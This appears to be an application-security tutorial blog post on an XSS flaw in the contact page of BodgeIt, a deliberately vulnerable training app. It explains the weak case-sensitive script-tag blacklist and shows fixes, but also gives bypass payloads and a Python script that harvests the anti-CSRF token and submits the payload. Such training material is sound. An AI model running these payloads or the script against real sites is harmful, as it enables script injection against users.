AppSec-Code Review & Python automation-story-2

This is the sequel to the Python automation post I had published earlier. In the last blog, I explained how to install the BodgeIt open-source application and perform a source code review. Please go through my previous blog before following this one.

XSS attack in the contact page

As part of this post, an XSS attack is performed against the contact page. The vulnerability has been clearly explained in the URL below. Since we are not focusing on the process of finding the vulnerability, that part is not explained in this blog. I kindly request you to have a look at the link below for a better understanding of the vulnerability.

In order to perform the attack, the following two pieces of information are required.

  • The anti-CSRF token, which has to be sent along with the POST request
  • The payload for performing the XSS attack

Steps to reproduce

  1. Enter the application URL in the address bar and go to the contact page.
  2. Capture the CSRF token from the server response.
  3. Inject the payload, together with the captured CSRF token, for a successful XSS attack. The mixed case of the tag is deliberate (see the code review below):

<sCriPt>alert('xss')</ScRiPt>

Secure code review

contact.jsp

In the contact.jsp page, the application accepts a comment from the user and removes the strings <script> and </script> from the input in order to prevent XSS. However, black-listing the input this way is not strong enough to protect the application: the filter only matches those two exact strings, so a tag written in mixed case, such as <sCriPt>, is left untouched and is still interpreted by the browser. It is always recommended to validate against a white-list of allowed input (and to encode the output when it is written into the page) rather than to black-list inputs.

Due to this poor black-listing of the input, the attacker is able to perform the XSS attack here.
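To make the weakness concrete, the following is an added example (not code from the post or from BodgeIt) that re-creates the described filter in Python and runs the post's payload through it, next to an output-encoding fix and an allow-list check. It assumes the removal in contact.jsp is an exact, case-sensitive string replacement, which the mixed-case bypass implies; the allow-list pattern is an illustrative assumption for a comment field; and the inputs are constructed. It goes a little beyond the post's single payload by also showing a nested-tag variant and a payload that needs no script tag at all.

```python
import html
import re

# Constructed Python re-creation of the filter the post describes in contact.jsp:
# the two literal strings are removed from the comment and the rest is echoed
# back into the page. Assumption: the removal is an exact, case-sensitive string
# replacement (the mixed-case bypass in the post implies exactly that).
def blacklist_filter(comment: str) -> str:
    for banned in ("<script>", "</script>"):
        comment = comment.replace(banned, "")
    return comment


# Fix 1: output encoding. Whatever the comment contains, the browser receives
# text, never markup, so letter case and nesting tricks no longer matter.
def encode_for_html(comment: str) -> str:
    return html.escape(comment, quote=True)


# Fix 2: allow-list validation. Assumed policy for a free-text comment: word
# characters, spaces and a few punctuation marks, 1 to 500 characters. Anything
# else is rejected outright instead of being "cleaned".
ALLOWED_COMMENT = re.compile(r"[\w .,!?'-]{1,500}")

def whitelist_accepts(comment: str) -> bool:
    return ALLOWED_COMMENT.fullmatch(comment) is not None


# Crude stand-in for the browser: is there still a script tag (any case) or a
# tag carrying an on* event handler in the rendered HTML? Encoded output has no
# '<' at all, so it never matches.
ACTIVE_MARKUP = re.compile(r"<\s*script\b|<[a-z]+[^>]*\bon\w+\s*=", re.IGNORECASE)

def looks_like_active_markup(rendered: str) -> bool:
    return ACTIVE_MARKUP.search(rendered) is not None


# Constructed inputs: the exact strings the blacklist targets, the post's
# mixed-case payload, a nested variant (one removal pass re-assembles the tag),
# and a payload that does not use a script tag at all.
PAYLOADS = [
    "<script>alert('xss')</script>",
    "<sCriPt>alert('xss')</ScRiPt>",
    "<scr<script>ipt>alert('xss')</scr</script>ipt>",
    "<img src=x onerror=alert('xss')>",
]


def compare_filters(comments=PAYLOADS):
    """Per comment: (comment, active after blacklist?, active after encoding?, allow-listed?)."""
    rows = []
    for c in comments:
        rows.append((
            c,
            looks_like_active_markup(blacklist_filter(c)),
            looks_like_active_markup(encode_for_html(c)),
            whitelist_accepts(c),
        ))
    return rows


if __name__ == "__main__":
    for comment, bl, enc, wl in compare_filters():
        print(f"{comment!r}\n  active after blacklist: {bl}"
              f"\n  active after encoding:  {enc}\n  allow-list accepts:     {wl}")
```

Only the first payload, the one the blacklist was written for, is neutralised by it; the other three reach the browser intact. Encoding stops all four, and the allow-list rejects all four before they are stored or echoed.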

Python code

python script

As discussed earlier, the CSRF token is captured from the server first and then fed back to the server along with the XSS payload. I have added descriptions in the code for better understanding.
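The script below is an added example, not the author's script from the post; it automates the three steps above using only the Python standard library. The base URL, the POST target and the form field names (anticsrf for the token, comments for the message) are assumptions about the BodgeIt contact form, and the sample page HTML is constructed so that token extraction and body building can be exercised without a running instance.

```python
"""Added example (not the original post's script): fetch the contact page,
harvest the anti-CSRF token from it, POST the token together with the XSS
payload, and confirm the payload came back unfiltered.

Assumptions (not stated on the page): the application runs at BASE_URL, the
form posts back to contact.jsp, the token travels in a hidden input named
'anticsrf' and the comment in a field named 'comments'."""
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from html.parser import HTMLParser

BASE_URL = "http://localhost:8080/bodgeit"     # assumption
CONTACT_URL = BASE_URL + "/contact.jsp"        # assumption
TOKEN_FIELD = "anticsrf"                       # assumption
COMMENT_FIELD = "comments"                     # assumption
PAYLOAD = "<sCriPt>alert('xss')</ScRiPt>"      # the post's payload

# Constructed stand-in for the server response to step 1, used for offline runs.
SAMPLE_PAGE = """<form method="POST" action="contact.jsp">
<input type="hidden" id="anticsrf" name="anticsrf" value="0.123456789">
<textarea name="comments"></textarea>
<input type="submit" value="Submit"></form>"""


class HiddenInputParser(HTMLParser):
    """Collect the value of every hidden <input> on the page, keyed by name."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value") or ""


def extract_csrf_token(page_html: str, field: str = TOKEN_FIELD) -> str:
    """Step 2: pull the anti-CSRF token out of the contact page's hidden input."""
    parser = HiddenInputParser()
    parser.feed(page_html)
    if field not in parser.hidden:
        raise ValueError(f"no hidden input named {field!r} in the response")
    return parser.hidden[field]


def build_form_body(token: str, payload: str = PAYLOAD) -> bytes:
    """Step 3: URL-encode the token and the payload as the POST body."""
    return urllib.parse.urlencode({TOKEN_FIELD: token, COMMENT_FIELD: payload}).encode()


def payload_reflected(response_html: str, payload: str = PAYLOAD) -> bool:
    """Success check: the payload came back byte-for-byte, neither stripped nor encoded."""
    return payload in response_html


def run_attack(opener, contact_url: str = CONTACT_URL) -> bool:
    """Steps 1 to 3 against a live instance; the opener keeps the session cookie."""
    with opener.open(contact_url) as resp:                       # step 1: load the page
        token = extract_csrf_token(resp.read().decode("utf-8", "replace"))  # step 2
    req = urllib.request.Request(contact_url, data=build_form_body(token), method="POST")
    with opener.open(req) as resp:                               # step 3: token + payload
        return payload_reflected(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
    print("XSS payload reflected:", run_attack(opener))
```

Point BASE_URL at a running BodgeIt instance to use it live. The cookie jar matters: the anti-CSRF token is tied to the session that fetched the page, so the POST has to carry the same cookie. payload_reflected is the pass/fail signal for the automation: with the blacklist described above the mixed-case tag comes back unchanged, whereas an output-encoding fix would return it as entities and the check would fail.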

Python output
